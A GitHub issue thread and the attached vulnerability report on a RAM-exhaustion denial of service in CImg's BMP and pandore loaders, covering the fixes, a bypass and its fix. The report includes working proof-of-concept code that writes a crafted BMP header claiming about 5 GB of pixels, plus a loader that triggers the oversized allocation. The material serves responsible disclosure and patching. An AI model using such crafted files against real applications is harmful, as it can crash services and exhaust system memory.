Denial of service via RAM exhaustion in _load_bmp #343
Comments
update: apparently the same type of bug also affects .pandore files
Thanks. I will investigate. I suppose this is not expected?
OK, I was using Python 2.7 (the default one).
Hmm, it still does not look like a .bmp file anyway (112 bytes):
Anyway, I've added some code to check the validity of files. It should help:
Hello, thanks for responding. Regarding the question of whether crash.bmp is still valid: I get: so on my system, it still shows up as a valid bmp file.
Regarding 619cb58, I think this won't work when reading a virtual file buffer ( When reading the file from disk, the check seems fine to me. It is notable, however, that with a large file one would still be able to cause a big memory allocation, but this is not as critical, since sending e.g. a 4 GB file to an application would probably be prohibited by other means.
Indeed, but in this case, as the data are read byte by byte, there is not much we can do, because there is actually no way of knowing the amount of data that will be passed through the
Ah thanks, I see the problem here. How about making the limit user-controllable? It could have an initial value and then be user-settable. I'm thinking of something like
So, 193abd7 is a start :)
I agree! ^^ Now I wonder if this limit should also be used in other places, but at the moment I don't have time to investigate. Maybe one could integrate this check into I will quickly verify if 193abd7 fixes the crash on my machine...
Okay, so the old crashing images do not crash anymore.
Hello again, the statement that I've made about pandore files is wrong; it was a mistake on my end. The fix seems to prevent RAM exhaustion in both file types. Thank you for your time and dedication :)
Just attaching the initial report for reference: https://huntr.dev/bounties/a5e4fc45-8f14-4dd1-811b-740fc50c95d2/
Hello, there is a small update: I've been investigating the loading process a bit more and actually found a bypass for the proposed fix. It has to do with buffers that are allocated without size checking through cimg_max_file_size when loading image files via _load_XX. In this instance, I found the bypass again in the bmp loading process, but since this is a general problem (and I am certain it will also occur in other parts of the lib), I've made pull request #348 to address it. I've fuzzed the image loading process of ascii, analyze, inr, pnm, bmp, pandore, dlm and pfm files and not found a single RAM exhaustion with this new change :) Edit: I see that it is merged already. Thanks!
@7unn3l - thanks for the heads up. I have added a comment to the report for reference.
Hi, this is just a gentle ping on this issue. Any news about a fix?
To me, it has been fixed already. See https://huntr.dev/bounties/a5e4fc45-8f14-4dd1-811b-740fc50c95d2/
Description
Via a maliciously crafted pandore or bmp file with modified dx and dy header field values, it is possible to trick the application into allocating huge buffers (e.g. 64 GB) when reading the file from disk or from a virtual buffer.
Version
This affects the newest version of CImg, which is 3.10 (commit 607aea7) at the time of writing.
Proof of Concept
Since I cannot attach bmp files in this format, here is a small Python script that will generate a bmp file with the given dimensions. Note that the final buffer size is calculated by multiplying the product of width and height by 3; this code snippet uses a sample value of 5 GB.
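The script itself is not reproduced in this copy of the report. Purely as an illustration, here is a rough equivalent in C++ (the library's own language rather than the original Python); the minimal BMP header layout, the 42000x42000 dimensions (roughly 5 GB claimed) and the file name crash.bmp are all assumptions of this sketch:

```cpp
#include <cstdint>
#include <fstream>

// Little-endian helpers for the BMP header fields.
static void put_u16(std::ofstream &f, std::uint16_t v) {
  f.put(static_cast<char>(v & 0xFF));
  f.put(static_cast<char>((v >> 8) & 0xFF));
}
static void put_u32(std::ofstream &f, std::uint32_t v) {
  for (int i = 0; i < 4; ++i) f.put(static_cast<char>((v >> (8 * i)) & 0xFF));
}

int main() {
  // 42000 * 42000 * 3 bytes ~= 5.3 GB claimed by the header.
  const std::uint32_t width = 42000, height = 42000;
  std::ofstream f("crash.bmp", std::ios::binary);
  // 14-byte BITMAPFILEHEADER
  f.put('B'); f.put('M');
  put_u32(f, 112);            // declared file size; the allocation is driven by the dimensions below
  put_u16(f, 0); put_u16(f, 0);
  put_u32(f, 54);             // offset of the pixel data
  // 40-byte BITMAPINFOHEADER
  put_u32(f, 40);             // header size
  put_u32(f, width);          // dx
  put_u32(f, height);         // dy
  put_u16(f, 1);              // colour planes
  put_u16(f, 24);             // bits per pixel -> 3 bytes per pixel
  put_u32(f, 0);              // BI_RGB, no compression
  put_u32(f, 0); put_u32(f, 0); put_u32(f, 0); put_u32(f, 0); put_u32(f, 0);
  // A handful of dummy "pixel" bytes so the file is not just a bare header.
  for (int i = 0; i < 58; ++i) f.put('\0');
  return 0;
}
```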
then read the file via standard methods:
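The exact reader source is also not reproduced here; a minimal test.cpp exercising the standard loading path (assuming CImg.h is on the include path) could be as simple as:

```cpp
#include "CImg.h"
using namespace cimg_library;

int main() {
  // The constructor calls load(), which dispatches on the .bmp extension to
  // _load_bmp and allocates width*height*3 bytes based on the header fields.
  CImg<unsigned char> img("crash.bmp");
  return 0;
}
```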
The code was compiled with g++ 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04) via
g++ test.cpp -o ./test -ljpeg -lpng
Root cause
Line numbers refer to the main branch at commit 927fee5.
Although safe_size (line 11771) does check for overflows of the size_t type, it still allows very large values. One might expect the try/catch block try { _data = new T[siz]; } (line 11885) to reject allocations that are too big and thus completely prevent this attack, but in practice allocations equal to the maximum available RAM of the system, or even somewhat larger (I tested the 5 GB case on a machine with 4 GB of RAM), will not throw an exception such as std::bad_alloc.
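This is a consequence of memory overcommit: on a typical Linux configuration, operator new hands out virtual memory that may exceed physical RAM, and the system only fails once the pages are actually written. A small stand-alone demonstration (not CImg code; the exact outcome depends on the OS overcommit settings):

```cpp
#include <cstddef>
#include <cstring>
#include <iostream>
#include <new>

int main() {
  const std::size_t siz = 5ULL * 1024 * 1024 * 1024; // ~5 GB, as in the PoC above
  try {
    char *data = new char[siz];  // on an overcommitting system this usually succeeds...
    std::cout << "allocation of " << siz << " bytes succeeded\n";
    std::memset(data, 1, siz);   // ...and only touching the pages exhausts physical RAM
    delete[] data;
  } catch (const std::bad_alloc&) {
    std::cout << "std::bad_alloc thrown\n"; // what one might naively expect
  }
  return 0;
}
```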
Impact
This vulnerability allows an attacker who can send images to an application to force a premature process exit and exhaust system memory, potentially leading to a full system denial of service.
Prevention
One could define a global constant that regulates the maximum value safe_size can return. The user could then change the default value depending on context.
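A sketch of what such a cap could look like (illustrative only, not CImg's actual fix; the macro name cimg_max_buf_size and the helper function are hypothetical):

```cpp
#include <cstddef>
#include <cstdint>
#include <stdexcept>

// Hypothetical compile-time default; a user could override it before including the library.
#ifndef cimg_max_buf_size
#define cimg_max_buf_size (1ULL << 30) // 1 GB cap on decoded image buffers
#endif

// safe_size-style helper: overflow-checked dx*dy*channels, bounded by the cap above.
static std::size_t checked_buffer_size(std::size_t dx, std::size_t dy, std::size_t channels) {
  if (dy && dx > SIZE_MAX / dy) throw std::runtime_error("image dimensions overflow size_t");
  std::size_t siz = dx * dy;
  if (channels && siz > SIZE_MAX / channels) throw std::runtime_error("image dimensions overflow size_t");
  siz *= channels;
  if (siz > cimg_max_buf_size) throw std::runtime_error("image buffer exceeds cimg_max_buf_size");
  return siz;
}
```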